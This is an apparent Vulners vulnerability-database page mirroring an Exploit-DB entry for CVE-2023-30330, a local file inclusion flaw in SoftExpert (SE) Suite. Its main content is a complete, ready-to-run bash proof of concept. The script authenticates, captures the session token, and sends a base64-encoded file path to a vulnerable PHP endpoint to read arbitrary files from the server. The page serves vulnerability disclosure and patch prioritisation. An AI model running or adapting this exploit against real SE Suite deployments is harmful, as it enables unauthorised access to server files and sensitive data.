Vulners
Lucene search
SoftExpert (SE) Suite v2.1.3 - Local File Inclusion
๐๏ธย 02 May 2023ย 00:00:00Reported byย Felipe AlcantaraTypeย 
ย exploitdb๐ย www.exploit-db.com๐ย 298ย Views
| Reporter | Title | Published | Views | Family All 14 |
|---|---|---|---|---|
 | SoftExpert (SE) Suite v2.1.3 - Local File Inclusion Vulnerability | 2 May 202300:00 | โ | zdt |
 | Exploit for Untrusted Search Path in Softexpert Excellence_Suite | 1 Apr 202314:12 | โ | githubexploit |
 | CVE-2023-30330 | 24 Jan 202520:04 | โ | circl |
 | SoftExpert Suite ๅฎๅ จๆผๆด | 2 May 202300:00 | โ | cnnvd |
 | CVE-2023-30330 | 12 May 202300:00 | โ | cve |
 | CVE-2023-30330 | 12 May 202300:00 | โ | cvelist |
 | EUVD-2023-34753 | 3 Oct 202520:07 | โ | euvd |
 | CVE-2023-30330 | 12 May 202301:15 | โ | nvd |
 | CVE-2023-30330 | 12 May 202301:15 | โ | osv |
 | SoftExpert Suite 2.1.3 Local File Inclusion | 3 May 202300:00 | โ | packetstorm |
10
# Exploit Title: SoftExpert (SE) Suite v2.1.3 - Local File Inclusion
# Date: 27-04-2023
# Exploit Author: Felipe Alcantara (Filiplain)
# Vendor Homepage: https://www.softexpert.com/
# Version: 2.0 < 2.1.3
# Tested on: Kali Linux
# CVE : CVE-2023-30330
# SE Suite versions tested: 2.0.15.31, 2.0.15.115
# https://github.com/Filiplain/LFI-to-RCE-SE-Suite-2.0
# https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-30330
#!/bin/bash
# Usage: ./lfi-poc.sh <domain> <username> <password> <File Path>
target=$1
u=$2
p=$3
file=$(echo -n "$4"|base64 -w 0)
end="\033[0m\e[0m"
red="\e[0;31m\033[1m"
blue="\e[0;34m\033[1m"
echo -e "\n$4 : $file\n"
echo -e "${blue}\nGETTING SESSION COOKIE${end}"
cookie=$(curl -i -s -k -X $'POST' \
-H "Host: $target" -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0' -H $'Accept: */*' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' -H $'X-Requested-With: XMLHttpRequest' -H $'Content-Length: 213' -H "Origin: https://$target" -H "Referer: https://$target/softexpert/login?page=home" -H $'Sec-Fetch-Dest: empty' -H $'Sec-Fetch-Mode: cors' -H $'Sec-Fetch-Site: same-origin' -H $'Te: trailers' -H $'Connection: close' \
-b $'language=1; _ga=GA1.3.151610227.1675447324; SEFGLANGUAGE=1; mode=deploy' \
--data-binary "json=%7B%22AuthenticationParameter%22%3A%7B%22language%22%3A3%2C%22hashGUID%22%3Anull%2C%22domain%22%3A%22%22%2C%22accessType%22%3A%22DESKTOP%22%2C%22login%22%3A%22$u%22%2C%22password%22%3A%22$p%22%7D%7D" \
"https://$target/softexpert/selogin"|grep se-authentication-token |grep "=" |cut -d ';' -f 1|sort -u|cut -d "=" -f 2)
echo "cookie: $cookie"
function LFI () {
curl -s -k -X $'POST' \
-H "Host: $target" -H "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0" -H "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8" -H 'Accept-Language: en-US,en;q=0.5' -H 'Accept-Encoding: gzip, deflate' -H 'Content-Type: application/x-www-form-urlencoded' -H "Origin: https://$target" -H "Referer: https://$target/softexpert/workspace?page=home" -H 'Upgrade-Insecure-Requests: 1' -H 'Sec-Fetch-Dest: document' -H 'Sec-Fetch-Mode: navigate' -H 'Sec-Fetch-Site: same-origin' -H 'Te: trailers' -H 'Connection: close' \
-b "se-authentication-token=$cookie; _ga=GA1.3.151610227.1675447324; SEFGLANGUAGE=1; mode=deploy" \
--data-binary "action=4&managerName=lol&managerPath=$file&className=ZG9jX2RvY3VtZW50X2FkdmFuY2VkX2dyb3VwX2ZpbHRlcg%3D%3D&instantiate=false&loadJquery=false" \
"https://$target/se/v42300/generic/gn_defaultframe/2.0/defaultframe_filter.php"
}
echo -e "${blue}\nExploiting LFI:${end}"
LFI
function logout () {
curl -i -s -k -X $'POST' \
-H "Host: $target" -H $'Content-Length: 0' -H $'Sec-Ch-Ua: \"Not_A Brand\";v=\"99\", \"Google Chrome\";v=\"109\", \"Chromium\";v=\"109\"' -H $'Accept: application/json, text/javascript, */*; q=0.01' -H $'X-Requested-With: XMLHttpRequest' -H $'Sec-Ch-Ua-Mobile: ?0' -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36' -H $'Sec-Ch-Ua-Platform: \"Linux\"' -H "Origin: https://$target" -H $'Sec-Fetch-Site: same-origin' -H $'Sec-Fetch-Mode: cors' -H $'Sec-Fetch-Dest: empty' -H "Referer: https://$target/softexpert/workspace?page=home" -H $'Accept-Encoding: gzip, deflate' -H $'Accept-Language: en-US,en;q=0.9' -H $'Connection: close' \
-b "se-authentication-token=$cookie; language=1; _ga=GA1.3.1890963078.1675081150; twk_uuid_5db840c5e4c2fa4b6bd8f89a=%7B%22uuid%22%3A%221.bJmDVb5PBlMumGNq2QO9gxk5hjdc6sp2pgENmao2hxHntg00r0qllmuXqCXTWG9uYLT1GkRDFuPY4ir63UIEJEXSS0pIJi8YlIvsB4edfrG1RTcS3CPr58feQBNf1%22%2C%22version%22%3A3%2C%22domain%22%3A%22$target%22%2C%22ts%22%3A1675081174571%7D; mode=deploy" \
"https://$target/softexpert/selogout"
}
echo -e "${blue}\nLogging out${end}"
logout >/dev/null
echo -e "\n\nDone!"Data
Build on a solid foundation withย Vulners data
Weย provide theย essential building blocks forย cybersecurity solutions withย comprehensive, structured, andย constantly updated vulnerability andย exploits data
Api
Power your application withย Vulners API
The Vulners REST API offers reliable, high-performance access toย vulnerabilityย intelligence, withย 99.9%ย SLAย uptime andย CDN-backed data delivery forย seamlessย global access
App
Assess and manage vulnerabilities withย Vulnersย tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
02 May 2023 00:00Current
9.8High risk
Vulners AI Score9.8
CVSS 3.19.8
EPSS0.02583
SSVC